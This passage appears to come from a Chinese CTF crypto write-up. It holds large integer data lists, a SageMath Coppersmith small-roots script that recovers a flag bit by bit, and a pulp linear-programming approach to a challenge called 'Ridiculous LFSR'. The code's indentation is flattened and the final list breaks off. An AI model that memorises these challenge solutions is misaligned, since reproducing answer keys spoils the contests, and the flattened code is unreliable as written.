3381383877574350137522503821651560196443655576836134099019270524161940339533213692251540628743332895341002631990265662425131251518493693690750762808468808, 6958313731633073957446795849813233488765978764962619450590198540106777161715713215615033500808990591065365646295188315739669894282317319917228576278018406, 1960896405831292842605946619322834459362478823214925598149312724064328946214721789578814421678051144409236436766449112453593003328541192215192091933636734, 5632565434189438511307970717039852422184650151810607594958003725375385054015515256694405836817603452184736804987152881592354076205852546432030648057787591, 3603573992862714326961608272055291746708398966644592880817919800689293996666084571360391289272725497533046437441348306893175193890447914165494201524939611, 7474903502691814215567498428036645893505450281007799941238583338927406722102074074886778315274903489297377307154589449296202274148415972995482124963310378, 4453834861530051663457391436061966674036353387512847924098267394664245614544771920533048953529726769319902426772202891922371527902437458995604135559897851, 1102786889014137499942575507239978485536138217014375582488960413776215256742762391575571866269018253288039614227206226202039543826442945749886489020760555, 5819181457783611322733307742961052216159362723583927036792457371068806372047511415871771095654975468667138447780552955555513555056638821310631326088097594, 5350783653088149702130249422975425885358619638687285801319976913799219400957008639254989350379956422983174438616208248304178124943482159284688856427882476, 5407975892037877366747748247782784942626359392474490780401414242364609402709342063455017157687455426515562553403339115651619199260531719653695957995846884, 3794517216114524931330568036328063154438742706470430935271654450101636722629201788600435538678842639282204176078037775374577552489185921746586909494709350, 4813028683812337453439667232870428903347796255558450545195312222045031131530622492027570707117120567406833197112818961728314990337577549922000049162253026, 4168736532607887316867349506801730616149871937845395236694642506228574010442218053546084300084732240913201464341954608314193461339805167148965648305420065, 1644304673790151876822988473398685569445274466381097877774007588201165178580712478468318447654023766385962993642034440933486990087125016522481841525554418, 3272323811435548017098544676604826007281263207819707608974094419359845453827034021810308365205803808699793720434269958662733173559568693626725823830523951, 5113801222212223501585351730986251406089347057933870761166300252137101694946534210218482910779905716901903269585780429909114166918554650475679698939666960, 7367185236608014997144093713637831607813060347567225401435614840750615529359174788566627712415047019096391395987848751359211444320984364229040264232250347, 7328203064198766407620423511688647756732110754940462554167359942514912469472984874557396302639411097192166622739582506684090980853183532355356052013342850, 4523437218949006375173147004821491515506102502361607007444566307575381985145543164175889101976649601833859052269744348750790852031674142142321082080085374, 4273724505478240709533318976927602969075241856805102930644158874077102056271888560132009557308681384622946139372093763035004181594255612915451147736163922, 6633892462580042565075916146394014519934031456492581582696232902841995103321193422188963008664195377729749850289925799058143308539926631025298457869995251, 6169509944247962483385971098172418516592483966802035575349146386090325439457514069888832962415975113879881882573914698994132676970153204571161798060426959, 3256285626248446069935491899723799034095282472203915097687613854820767136629593585466663358480862140720477783952337168780774053750557343432373284719605324, 6331048185438636381128034307611846554199395294157903145386120516890114507132379097517463425180202574846193494950209454453553632205650001493733796628519904, 872181738403065361439465891100646927249351162552483924373320861025554171774143898435330437623419172431604704073899981678143805063125593789710949875122516, 1406480544629309137345942503005833292510530606658754179375250810785708465402024768464574239863242249391002243795549240771838259960328505710236917365602769, 4020383517365233059652253581665251883953184234325259330945739695799565543827794949986727000716633411556662208246902665789611951648513529158140999200113024, 7346076089884028559213574134808525732835095306489092835918646066756549284164774398813938145931120912498453579901815220219468490650593937084291990354288211, 1008972434939439799331810249262929830147469066388391203665051305919048565370719225975124026561354338584744357462875437960517547611547607749587446866984935, 1138122237018236024935463826962583703013383242319197251197782587764218994663318123794558118605019789805912019355702488748683288332172316540925168750693011, 2885036516023118722030225530875914783030452796945378973822517308409880007238921004962651806591949710395931071204946896956729539921657348605524380894930856, 1174919165709784308313801272529063114770102638642632279330761419309844157681097269146632909060905564422190917511823912287330982603321715149175424540807952, 1822172277602306307918505892660741934416829038575877346501827396986090046799230643060549831664309656676810862706623935921947091407228861553729177922296318, 5798551777325590632177977920490032880922603263787513188996760608217601251643800441987111233182981986500698853750265906110850519820622976320938277809651087, 1631039142231125671063485591884891109153446082339835397144824990636459540931037399276151130348668419063784251547609053785203594251895728982617545190172625, 6822585018808395924522283374321949362419741477559411771776139631041068953146298150241412984989810280716688415214705618585831740551540546538938751840941920, 7392532999825772747021016705769857947580453970673977933293475059754713255060925594043184430406915634257748695843801122758002808630682607391762847322966347, 4200416043633707481976635763461864075711000129209355574856577928270114110650472059960184619083933076056361124269826078226332159847946066219525572748411389, 5831499177680618517701718051808100176327261455306947899404567341304172999546796257242430716284215830378313170750113495900378450488985702527654573407591604, 217382391939302040990707847001419780554662478483941291607895867830194763224547323386206597668684960652790216684122921104785843850008974226089640615359588, 3563421241650880780082226567511705159836428557509283040300348054001847792941943033492209255595342155329311556390787151388283881020228395873713082890388429, 2834501312583471840305615819185051972323433904228846780534686268394437510952673347232865988163605618916585394772423752529382564690787164667296165701431097, 6868235591701962890942206085524935228181359564049485424902722254715745788451657979258980320805294461759383983309768035909047537011184542354343426226535954, 2772923054484873603401843956771430778727396268783883521927369969604621326253333175756879115590603548737490996783800762012865049710708133535816778453037797, 3622892067090536628337021012065353050269995872027790907041571871005896492558194343251769120410955308732501439323843012189523634511537530174600421000324152, 3174382616868334923945145958891531833810784973832007567638313125598593093295762652554591142635749155979753746488256396393014722030104836291045197465838874, 4256588447149423373516508900510905722182922233502507560440170423785411636330486332004710720420308453508981146707491199490587821515576748623301614087560564, 1736287477504227757504390658454291750300255766127813696614904571418247794506916009652664930087502577299347386893027620051682352657093167964886525901374421, 3326252254728387004599613046242779602412782347654728014950813737896800835206483664278000869822394572439763801102268423371282992356160440168810738590406525, 697910014539157236690695873831129300538900674883953291931508969476426457003962295226591860776440915513707907151961779292122853870463153483378009272618702, 2301211850580231081276758728582342727269395486786405951294889701663387598840276569902515897473453845027548603307049976566142946803424132635663886899432250, 315134629471600303606805305663881030546935294375038155917587099756091620477632647493152587633141267040852979734177862014845266092756864325812651667377650, 7105462121113915447812110852869002434387137111948584715566548923138131722450734296424572169741302092574907865287898578058110758999979994197441828438056921, 3300300591377886134914089272436825439726939308122191385395076321727068481400117340100390975845421186013797094071096642022701305779531240082056215170691907, 5209908581735885427030041366511127166296746421936096315739932763700621371081873203540124575726441671832663224261941004139363982285656624124076705570886583, 1154686459877886409675101523833930326905606252049963846151357136126939551475321758632100365527303102685404974694677599534847589621867621089770303699361285, 4768380791599822404044581653236224254694100631155418993737177544254889720459051883461358041571437042827894169852906850161204129565226838809765484772609831, 6519272360175262368113444254043218251217473485512896505557613922384188172491962719027588019777642497760243610433358337890526001529714004093998089260590115, 5539053249581890877425019909295492880000650434372972441302487949521423968861816558288431070612199580172360997204812583587269469469582544485916148352980019, 7180725493335662778242589228754248140612619896535054327216184922710308418403398518192440627395933541113479319874938811558186010920295694184045531485103301, 6439652947081203383226127185295273926558072564125585015396134417913331369040663238840768380192024806334946864694430434463548427598694769442936350810041659, 3245465276930424842770152552363153855198233375845821016547134156655891546285445242176777250757720931068083764965941212175322427899699774443320906683613429, 3330671010160974790941557013449713059118567356889116146371058133454602203996735161927560264154595456566285024657648571607105351387609456058119560350941195, 6821986419382358618871417612473438529471138091490778402693730492154877205917973035166251347694136203207428205689479652787363100732238063420083552446912260, 3973076314115837840388612845250760051181878076099196039596384407984515672700339516672228201427593379397452187399110835572187888841503596454971054349648092, 4936865509410441306003485456654600435810022782089161209298988331334616218685789921793418818836113871635837564047061992457013576475065200998084352420428693, 138700503419145956820788052657317918621923476051057398001983824874083519362023997368500147088665561211553435550394279482027931753726863922667218079958354, 2481786561756785207325906602147091808842497737642832788362792587651848852965242072409069192032646439501804678207202584354714469099159965020749372900819062, 2572966397365071070654120221944623158532775269276617023232067395512962802028977605646853130003871292401009669087150435707928913057761970531126725262527731, 6324132522312380727155066269548600361416732110581522652127899259603830770942464277650267364774579111002090549542565838880699852117422754835525652571111849, 2339251080737087010136154732037704737484014327068033130667640873437734095410095181193334660070307269260017108710970839423039789699516243549061662798490748, 596692309016675332246236030453828565625198232854941478287361932536236803232591604919152974295482597894350887233951933917242763428364741059557194730860867, 3231925023788832994639927822147159988469722574330335702382566517642756463720380913469258624450017736103858240295434431615794944500782164779140509374498292, 3706194213005303193311186330859543390006370237235447956684299837603246086860980931589920333787040703883765235094478833134950007831634936427977327272441677, 351024256493381590147178467314615210963956286682422412361822273493021814307927189899504167964982069941389869877771567529961020428594916729291351164766714, 5527906213702976931482774431672879512905804887186892574131908318992828241389901891585393350658310205639068315074785520510255856601931455867600239963166247, 2017076351585850676928548286482304434260902340533771340947124642362498045552976855585229734403073967099459032309056034517546496946485569947711672936232251, 6606391007643552845461410755750177103306894582904290466795769413855622944986111330918202181514262456259757426756554119919437597572245458049760121890685483, 3976794737583161555378790610288650216881769787265598693932584021164001340767600778974044896395016019753175398434145183346770881863807773607083321813152146, 1976570458025947190299436162893389666532602499144231965436624094292400273521696468612784292454941928317981225222042869102889153436884226004257306664186224, 1333572090763864365501788638833125474321640098421570543062623326970047533378026300659852738096446689374149500630940056168504384744386304121981986069074738, 4094376382372907931741683043621776016252091214115739978474741756393227937159593280931477025956477809531851227977187097210602357391255622982813562462642364, 6264383009683115307078394260047246870295578204759486788817491791169929708179029358066449000448698444449475236674501117676412946172614530804780574420628105, 199137086262687063307305416689167530127371905785989526590867601812049713978470802038076806024081100770722011954217193560464525063012271013485100046480434, 137370596585451885626683935778032489189662999701803014246673300724221630285697975615640788752297655925153936704108286838378712159128589227953108892839067, 1675200126924372537477404902440194684894618968086946292430615595770747465326052214117955845424144297606123329226704863582536702296456881683200467264953084, 920430840642252596014354586324532907994647101175450197778140838389450328950544750243919593649180694276270146041567020826626028986987527221446993999802488, 5728938330179054856695709301384161216687482774286804119491221949127809397170831911448918330662082491881325648917471998112751914425749543963813560036115462, 593719328270634636680020982754644279380725204638837460008530459410091974477057938651905935975022823774038282566052812040059930960095036828109547728808244, 1643546173278799238464393279676091384769967683609512488490651937924603308582697230534481193558624001742810286664081883578532841792706230914808086867461495, 4950051105207396429773774428166075000334954821837737397232251436180818678710199211724231773966528636362313843123212954531465462181993269072316970641483752, 2321277584052677386109144043102555431537463526323344804107445290609657090933455927487364656832031958873005142137183551206203381350955112720970983629475684, 4579436233520661038161884029091970187080828058613144386236685859057904033991019280601043878403765169660457722265308860322878865696640767650494852640425277, 18906136137848496579324560678747031381788029072767996841559376494499137524554845226393032530233707147980671422307838425424818115436891501593223022031827, 3649739447103582098076238608317392519612960237580342548776236425045996900841506099933841198429337672932374664711953830865692945603633311211804057613236324, 6228248267252875664628627371482930203797923900755249884900489349175534284948790784868686455242930775996109784153985021962472756596423498541138085487322723, 3232259016167568396088636124691186778872755608979528475941705605372538123982530089543735943732668890939456701500424525813466899287571731973313921868984805, 5230180726800777097714472558016559715011581240550241042117243307455060250183937192110232322958177161094301709569356532188804008960304943709517659100012009, 1316182411882810585716069785492527119939221679926043191741779246579486911220519569558733014732939798403126398938304154350259601846917283148808746705774112, 5171393541792955967386504096724384486848387545027162506058824561994639378771299850868388303197135071554546442555505669680390535567513140238066731199431524, 35024069142023136144503873705187851775772996841748742043201622416528228333326846510775142995357882951453924641801621144372669846361298917545554103413182, 2137302852938511100617562003058664983273624114396214242893654581723221516655474918148779088953177782808419941448719984559118447096665545427696709937842713, 209930536158403353785934337280825398110386976890317925283707497575319531810780655757933953255645828866209390042351830836279337190397061501517408059277687, 3872986020267814657409271626722062503718111147627634098489147832056854032602800946436266352602142926616365232206071229597298304206045230548365661951077522, 1353182967413395061816484502209760000851237923728283774521553129820727442479338500131723368608904090168808192168529256743509840312000677736865380507537597, 3989012311734412151789222401298139163313553222907339266222343038762544577268515336723689194007193558263264033766563400869470061614041222467740729897778945, 6657934627409610222724351577670649726837779633184629144454851695438238638414565047620038308540585583268640359657949347136804823986752924495443174820297207, 1939957578240465449128685156366892125093156232541825538491850379716359815561015886172690604751039310402525340002812702097520600710037750287074101266805367, 377509715569111235799348790189128852911568008132618928612437037657021563709052313331430741131984546631013729797441300895357352523422174174809430228688926, 7368177743257889839799014630889959868082821591970785238021132865083837866069262950226618481068147023276973364092377863002882245295200052579960501239119196, 530830086210176067129258565875145262804901495700273204508256051933953374358572473802632052068174957448979978484249171505601497376201648157539650093189283, 7376502080925571165446902809763768694636061410762198687423828839330038942134761149049375581034657573374142320225725569977961901705450162870025527855762012, 2116346943204098782880885073913590762111226360036146748574267130728082070017266442714183443559725139912906721658381591908291299672511209398838786833026709, 1199777635466712774822205543754218307068664346791144786672662649003222367801203289358430843195259606424099228487895878674265477055329794956881054654716026, 1065047154492119587809130315926266634540312877479768838833721668340501716669517402638318223576664315605450627948046791863572627510566106993841377518051440, 57633491995533694973891797097577071270988915839965047519210039437757302634275399532642415936872646564776006731728624721483663422906045459777596215800302, 4387332259562199732908790016236494236575320110997164079966354117865561681913540018569486901341373579954728471417127066360146207405700122791914392223220374, 4912992173833881386838621974988117654635059839417714188337830801866998890203701279633706380019338050829956062780063083253085600338877188837462216423352515, 2131552631311009454861522771076696810466488782774072213678563451902847619730588023506731533122367751487975954054356961940799989994662298609806639374383532, 7330743882131510030850866494412341449415034749906932700942413372538363383327644179653467033858265470706634932159215618772560940313556355863046255441278467, 870604086459655029733256817860700701454236753458109416271222662286543283512867597595372666558165665232229331184146310877052169182296521503123019337439263, 680872135547510243494174626424856445629938462451189170183328643053275121638922821950403344522878368443252128937220909347015476786456818467367664615182582, 4724755014750126366154144612549612395192354863626845042731552287761516767759334583006493386068786737770070472800073340309754898657439678009537319332588077, 7033346038932236950889937133070711679204593535527563435243508327767199339263572857029806368736783025382461394453552346779980043507060604530741699271587049, 1488758945001976173736074193268523840116905967041374845299947176295647941623801576745116031908900162845435819502098566854672304706945102955494986567499180, 20319243686071492650906176986595192356910885022304521348362003892920034022589581031001779558837253235453466624134363975636645241026288893879461704222039, 3145267824376672830793568703183954478076762941060877390697773144210967898556496681613052310152161622984166937015938600723987465406736616195115143840204272, 7065211296316310929917647988477706260854777367720509215461102227370538671245933623485253881135209242186479608112449601079184899093566410058748022701249681, 5860016308325213119819184187670239564791333348087363680942925424162694462159018573839942821488405708712369104188452455045689910694321205617267927010904353, 5645361475249093719768450338234034726485554026640026662174673396653231400488355710059780115730446487495686330275120275600041319135689492356651341979038088, 6222727452583908397253535983805821930231388306224553254136976634073410340765549319231925139894850295061726002336384426016757007977849079223677773537255081, 3696429825336147971620059489168478959976463308851142886577508477570240282766636537964634680481107690278878090696361681958754963149721829332526387362213190, 7078032688626190314737342918176972325521293294689228613115610563935693105149448353402481648280874993385612176692849105916242678776294364778167973947550187, 3270971084919614392338441788730004011100304400583583883067217490582518979491757196768783495885678619945523947283699651895101048284585981169166481963660623, 2148843064997549913740046332281882693310226949255590440580489845028047589771544283453290518792858933379819319132584513015919677339284914344995646843998048, 1291525211756946411401294509523977729530718411866377519225168221934642683496562640471014219152338552064525235942687244806796479646413595124980238537943389, 4913307250241775374386695436715632464827403720055363596619529423169293536260965648729975796127464362240516770053847194323081306012483068777864581057200279, 6678281756307450766811979928838965105333300960175054010659048118393215643476339302253367353882325289237489247795405556958386170996096189421801964924482147, 657145172274590196493597590113130464259273254304875932677515103976617144895772233827673391830935998805215202067285182351547427598777010976174255888108237, 5254189861688322883166710121819982619221538207416112766290975591655559256081375216189936310254974303785089550027238530874504313982895640119168967142788774, 4107456224332124639796526866448719803417125732966259666717527193805945662592291598638635704829882984364017372324547020897502769788128092736578440387426559, 2858837243023389958060661218677166091417324132599396589197054884499323557500626489155371785733313327379967727003385933612324840437059452826759882016643192, 6834470718220476619599192939877802960626266906218601397992141268348842750307258845978436373245888045814447365868690654204442632005537885428710943936919252]
def small_roots(f, bounds, m=1, d=None):
if not d:
d = f.degree()
R = f.base_ring()
N = R.cardinality()
# f /= f.coefficients().pop(0)
f = f.change_ring(ZZ)
G = Sequence([], f.parent())
for i in range(m + 1):
base = N ** (m - i) * f ** i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)
B, monomials = G.coefficient_matrix()
monomials = vector(monomials)
factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)
B = B.dense_matrix().LLL()
B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1 / factor)
H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B * monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots
return []
if __name__=='__main__':
invx = pow(x,-1,n)
P = PolynomialRing(Zmod(n),'d1,d2')
d1,d2 = P._first_ngens(2)
#example: starting with the last character '}', in bytes, 0111 1101
#little-endian becomes:
bt = [int(i) for i in bin(b'}'[0])[2:].zfill(8)[::-1]]
ls = []
for a,b in zip(enc,bt):
a = a * pow(invx,b) % n
ls.append(a)
# now all numbers in ls(as c_i) satisfy y_i^2 = c_i mod n
c1,c2,c3 = ls[:3]
f = d2*(c2-c1) - d1*(c3-c1) - d1*d2*(d1-d2)
r1,r2 = small_roots(f,(2**48,2**49))[0]
y1 = int(((c2-c1) - r1**2 ) * pow(2*r1,-1,n))
# y1 = 7445124581785554422439585692405448860295095044875722435104074060647431272031703400923309405889656263499007854708983384325320777396841583280923100541248190
res = [1] # last bit of xxxx
P = PolynomialRing(Zmod(n),'d')
d = P._first_ngens(1)[0]
for cc in enc[1:]:
ff = (y1 + d)**2 - cc
r = ff.small_roots()
if len(r) != 0:
y1 += int(r[0])
res.append(0)
else:
cc = cc * invx % n
ff = (y1+d) ** 2 - cc
r = ff.small_roots()
y1 += int(r[0])
res.append(1)
final = int(''.join(str(i) for i in reversed(res)),2)
print(final.to_bytes(40).strip(b'\x00'))Ridiculous LFSR | Solved
使用线性规划求解器pulp求解
上来先求出每个密文c的汉明重量,同时利用已知状态的汉明重量l,逐个爆破flag的H(范围在range(200)中)
通过奇偶校验及上下界约束过滤不符合要求的H
随后构建约束矩阵,将已知等式导入pulp的实例中进行求解即可,最后可以对解出的flag额外进行校验(是否符合已知状态集的特性)
最后对Optimal的解校验下与既有输出的汉明重量对的上就可以输出
这确实和LFSR没关系,但格是????这确实和LFSR没关系,但格是????
import pulp
c = [42297244874154227355747870983475340112323993824772010462260148190717565409826725370735545, 41677400701121109635048747671622837956911768737672068835519677672106914862062830342960631, 57452439051831912575978550087095588779608971010887021942005556034303105898869205009836740, 30206534142489697033176528541005921018836275701263312130674778532060013455358093983879712, 13500839252751068992845013817723771030803091519132238870487697887254697509376733888504536, 7621796378408712558978505146362877232960051409262148889681248077136890217130878395519456, 8109001465631622913689504538076502359417666324976909690061345766063450588163752134229644, 13758233351786849418302009362714629531021461692489717953197206061369157426555053895698924, 26176848799391369959713679061830703507966458702140933532339068153258974701270333392156494, 56319553760838059196289000077233841092393589123057963836138245455416252685247112722653889, 24448877841090468309743366974603965649302584088406430055246490429867023700956993744875733, 38677473725661135810844044440475563976830856064681294639249731660493223936502392566464787, 41803858782276707313516547107608334073631800337900068069382524099370137014314985116744712, 35400852843226089810753766682284083382419831868317030303429610682236539615323120324608802, 20551226630424592187143445575716992521000722061233572741760349479174062294747011373740477, 6600201686232954035832564025373545546284418246233700810096036510369912902204313925853356, 33277152059411843891969633945174980126552603440971377120283350608315470133162464177759343, 26565250101153508470566988013776340760742950338670606743676164249846522843164936255017975, 41676053732334435067977182038444926137775455322269589496213436687284875246897599113807909, 3452528888217337704817517717964858474180670459952611166472069840091624526410945491352752, 461457718632052040222437414349207359370593744299497052651102291965226064347712706562468, 41544728913682148355295970038562065604607588523993722284422897491044433750715585741057736, 1437903826648245212397187409952329106600147225723435827015479108763406504626344415268744, 14279820065514107758153035507943994952969129531177131553331107577533740679904048076080226, 40245158630767454690213892853686199349075704321503844633822835545427439805586808532515777, 28959427998852614310930035535120199600555560665638419074714155981731815879190083238186079, 14465820282881389303850738435941796615115960106871543326798875042153170123155973675978868, 26440236352773642261735968781123554331989183882430160238110095536918325889966791505110133, 54943751129206433038004535781639913824078375797770190489810181825650331081843567868404360, 25415600734628541599813527942256483506844844372018614587971768087966695008265447901501323, 32802557075546639659062492910087682731661902978117476382819675964237518209779848923811100, 34919783655210924487373768186945726558224885841741629145369212681305601306305025301957422, 28973352741969084259434447161445100647568035029025986539818429425368329545417685308811528, 49247907965070056596413595920986586777850791686657203994562036278435617106041037931363993, 31927568993543654136925350959554441984350282326698393504766596073701963824000220969547930, 34825609033081431327585526755694756263936156731017414410699035684138288337623031797352394, 1028309159157594624987965435554173080943875672668615143318801244797237012029380595832967, 5110289750771349684638519457981579071855192490586763759680536956986234075124257327574888, 5569161723000849347113414128360150369963429142072996115483766672027477907846204139663900, 33578197641720290506348647767053912586266976397261135419867283367664946680531987937086934, 11358072748303855448312258694118441439620685929356684160392345256536031800062731741436936, 26530634373530856382895799310632174782669968404665783608171766050116353721781536550134642, 60424872522861596230437104141545653335410089056346767627571283401000049227503806378877834, 62915309114641126160955875380399333628342697268161370612948597388485928286899020144341090, 23218356855394663570023274544970126785647693669286810566273182577642682116594746992097694, 30421094423185381377251730126906717049640838924385024696292023669765874808488331873565001, 58418252229573713294857337663118208566532100635496070401831778912347825404870816299870537, 59799972622324251740931059477777110534644421270771509636993273967752707606321468149732739, 14205804214994100601396722671482822779425134009278137745903547297622824700537423407632722, 6257541068121890356363521411519789517584042692750009025950937741721301417682128735788749, 59732189880747261713008754290592454966487177536340167178933389761225880001753546467724498, 44081863649627045938919739672218957304846120482361469420676502142378037142201388765521513, 52264012610979834567012919427868127211800212163848883528204602577929259452500214645920645, 6019133834560478358941736631613926840503456565382633194743775196546630088776918720596388, 27568373442108351839053876889589056906369875914035591515221506009812575733616122084618955, 48193773236763776421451765010171992561103893739161960334536210270639944376339360122812810, 26371129575309103237634438944381716957534786720008884562890761259053656137353320926073514, 22303638148801478284778051829733671268939981278673044413783388861035587696671717234357154, 51680290615763743860688620016374006258068163996299162472391774153077699356135702204742131, 55680245601520318410577787771836729063468417541576461142608075370370186028033004033722992, 24656902565897935375208235458324400394755397066631106433826164420395454076329150294451959, 41067060449353405606856140601828596622116905581587309640835020865463952132303430755143857, 60385408888186796531901801451380620063482974768658139175453835067638653747325828147687010, 36799161258187444954247122211202222999420494066642054217769045057638400575075387616572913, 46635433257271829724801771359768056607047730538018061985096578548324142528876099638211901, 36125333786576890808214550722100212427172704754253350587545636143784461507408626840252264, 10078800428975025465609193332424011999039532207009896705557406040553077059823346253904838, 61976008915744728311360273439971891392914610441813879645983118239390508009627604080162449, 21651984099950509291149288427779695726836600077356040143613421727437411735201059350953812, 5000848089897170643830045231818637515463573128060819985752193577059897152711304379586257, 11262071485291471063342042651204112100932662503748625133797226843642107915673378851162973, 8599519883507657880744262527858409029618867550192517565051906189002581236498394461299763, 52761462368936370104699256176977402322963012000093742111310873000603693539003730154551161, 31424743887623603403773394267268740654438438013369067537691708825584205031058306357806620, 4217107272829027205810960906016664925077943881434054265853415513552610338652196729756601, 28400826624747599391372703182790303285649481667050419331297353411272483872606987534644746, 60060650044011079121715324447160840320658020128612318343182704923162272011278896967687312, 53929139530266356346803795548856916720745277532809675938644533973956378087410576518589576, 26379591388620504386798887656921446545792665053653128170055840135152315210597064971040154, 14726913152873259805748275665859212079011064586763681357762799810459803921173160562471008, 47445199722752860023554633616847274874996539751720918016635696808844883363033631073314463, 52889316427719911172842110127623349502573240147027307216793235887839994527258979424642259, 40735731423489386389199509070575214077154882306558998579566486129877865637947679877557413, 49555711989797811948291935885334714266039693666333873624912166989484106385185592069087723, 62690057893477914382483046797643169185287668057885608087777410280298696385783382048224955, 912563829455832789987125017066461210281170795252481779532388043715021004712439487665607, 46763998784504609586930552786632019136508036084644072565086643917694590790731533444137754, 61518791550712639616386404457651603679189390377556259465831507302640462098899677394679266, 40943851483533617800252572823393537395656020169564642564604648774094557851819273018843179, 22405504209597307331234991223377310746970664243338337616873679411491642068535213266341821, 46404837511573384021463037860417478443156007999709851803076266448179237652346291401331100, 46268763226550837872336538941086931655212737625218911538721436204233548621416636726944429, 30038401270745143104176390893097968830067669309881616850896317660165235157895200205727986, 2540669932502200112230275794081832189887329377161085729448708734612766940200242287732592, 14013873390487732313514429821020414821747839328766255209364299987328759083460765479913260, 35182455663005325288354086432431180144818721026466554984615980274198116389614906663755519, 13691824919991956358367594345706671590232409538916452098493195047828962046105588862564170, 31143467758133198954894299220402508091007637397391853965535033609647954449278764962811996, 9873246358960977985368434993810147028290427278879533043485724092088734573043102019903371, 44295326728598599369198370568198851846379390131895213393644377650544629325300815824925351, 10153559383941954956053852076760588298923248820925135312894920068859307612884762427883342, 40197395414593077016405460424199030724592124497065511126775517761387533689850850363151180, 6947358309104416718468503674810310565332744714701053665035057837546073142312305492222848, 11427459342275402119039259091643868865694304723455689819595065920933173571121179399752163, 1022370694088130680038431876320883523096305354406259160983676462792408577443093836618341, 3573288958183029242762524740989751339221058650740626037667313708741693813802290926625470, 28221354551716728283431952575666117544940955034373677551604659357352271862862606121740140, 61890712943747108713263617711575646252052950347849798462983687464866733920258668263800384, 28764948547972248108250298337846357038023815366750883587385231787053736659806394867604223, 170295037725898947223616449266460815626567096922483946701858863665872821685372452248731, 3128297006500028420266326341226610470308888279814177095064462972268272657244847019456938, 58399784255841004862901053204505973854245619067855167788679588001217930755836303534760408, 23591637456856690319066932689540404878557862130642496226593885518418828944503715674603145, 37157675626900643127619982984139553206226261460676553523331487710434225151336288351720273, 35468969826100549020807306203182590447727395812772335636791909815684516806515659541950425, 60183814815528944812967487185568707872659323946450765695363370641971496267496598200940883, 8991753983159954192624310993407394829522313676131861846922521563217978024630604542478506, 4374727856142510185491297780242123330552176147441973842849453220187151686957153187534651, 32180634220847332305295433797457954138844259620824251419307102886474982741258922257109116, 28859187555386356749201652567410081089815988752025819138799229819675458041798222630521555, 7236382695642852815318019217107777841043326448978126516854306934967128624182251788194611, 23920961751996857531025037920412862374674114854177141454709439344666840880978494670358226, 60398751408660673628559529405128994839048211171659926940959227471218693306634938271460807, 45622089038643290624405508823042913843322976079005503270987541867174566307592502851743009, 29376423984799564511373721289506524014554576057516040441011427389334261266778794105168402, 60716011158627684265889816132038979257891405370157095998295174067971876680999813026958646, 14066852933145932276840553945293307489292256148414792800835353766689690266158023611456448, 38909963554334372773702566230063879196645903212712180495285024341577533156132078951863235, 13219216956227090084731736968944020189345684702500103097764009491438995201922535750110533, 12047184846616274364750057585100960195203122258374559035354619653077549420279805688830569, 40878824787311679226644995854504445779435997250897811073896927863654858318640074150660335, 47051387354244152907693476971823579277056031380332953990264717482786405072730291080393602, 2575920831671377576731112459938002289385564143001000513706555068020695027371908443498864, 9655934184392401474644750753172504070993725136257621924621922559697575564039078693359566, 14786842505391282172041801824100595592360370638700717386624878787858839148389897690853818, 6236601310378032683086246917954153719256829133594125202220238491237093148538290360630066, 55627852593459403202674697705816469507353399457788841437946631410845152311307254377369058, 54064331778247558012873345044674363850906600684356852959979812098934906853034256913632942, 56171652511254446504953526367537493785776819377802764541372611542900576457343813754616608, 59472193415376171976666578698756095207946426212558647446311340502297175191369200716707175, 14874471492319538014735719076758166959483334569528116706634984671566667314343168335374800, 3452255492879840534576466909531386181257118339970814292312647964764783625068344168222674, 11498918884959777240031626647952292206187620090464596205258485517522453096360670813520604, 63184978867420827000378459987771141440259929091691818764740799698385905632292029229115322, 42576225922471095346064005992232106303232598062525732801743725409922464957387694356468070, 18758653820144032473727293556664088689771444338652352514443412059820621561450746181643235, 2592680730606632592454341020731233374381216424624284062950810186141687711345247990798040, 12504193128086519239965964245217345648066475678198932213686837834663306030984753279536765, 59871650328129354442696869730407155748407063706100788382107552783979864199687436072128628, 29150574544805547035488550464629172892282895036454412635735113154566569399785393997820193, 4339934359130579742822137967309064119888725523264050342018543308898539573601214628913788, 40043249528026665768503776173448685125297744611103918584684582762368532842152627606638058, 38253572526611961153202918502001076882369289610371836279966022472493120833151087959473472, 59566413460808457272364843655460573547389173215412780678608337003483218646674535081268996, 34893001677605453231541952651636130314683061962152038864011856386448768810776141213691888, 30437653231349191742638559930228023227499957716918360030010644121030386866968938860696122, 6068975811851757276331478621445053201347503628363494956657901579340926512088391554662908, 42437255943773581094337575432839864180556969240057871296569298873492089967790581366707860, 2824231381759644332812271461074234532641074681359661333575468081371254870250768153180248, 16555248648883579287822085599951347243438265319960186476502066796135290014254663611669366, 16801120380020692706747131550290916796021810308471660321433725528131357375258937081624685, 52811319089439113289114502891034892296867045376379859496915157442890609147281292394032079, 2427747996554721082206204381168365430938461322763296566587551908878430251729827046537681, 50200948420845479972535665295814073441377580284024863692867214069827357757288789893895991, 6177359999002114673561756142081450294373336743887669090863400551455518453371828887499681, 53616949614290086116037208586340097140022419734081784682104372061386267170313418076777325, 42420440139190257571054600350088962647930844285498785733422929374458783376075615481983078, 32591912956587135269425091354628712723151050943042556078480394466201419611728402409697930, 57621896373768465033272518177890680676514069370621089098978172043309781121437796227239737, 57835702642374781918489394604473565094348724682594863068490457777336738530854077990849413, 26346747476829639216701449342450489439847271884188281922148775150091200885412642910963197, 6198250087209613457682676152401681587200888018390461321399101828958819395668955664373806, 36193173498329742734739858360690907332833924889472744160474203743895866663677039182530474, 38450387700991233602108486088896043714494965636452621966214291298023760769172492462407197, 60087702251291866215373589764582523440205733703919230521824071216951147683946673171225809, 2304923787635022120537361272672007240859812541708975241267819303851925408875158300106380, 6944059743081819153620197897542416429435888872357914004982031853900947775831925011348886, 21490946139051131239999779213305941583862987201664838383650982519456788554395818900027182, 32829374670514231238884623994240964949300568771392513939233224576782475813534470143453486, 53555532753272892188523362013222185046549363246105184273371923434562206766842369216443888, 32795170935336105063729775222076641608604715709499611988459623411223280646077015998785888, 6269057978733683711002759273946385462537912970796465915908078029363227684921357426501748, 44381950364855196177367753215406200123614863529641602051737607404730348238946696810276979, 54379667620792422537750640932544601950186555539350277440344600591854193602597823593339809, 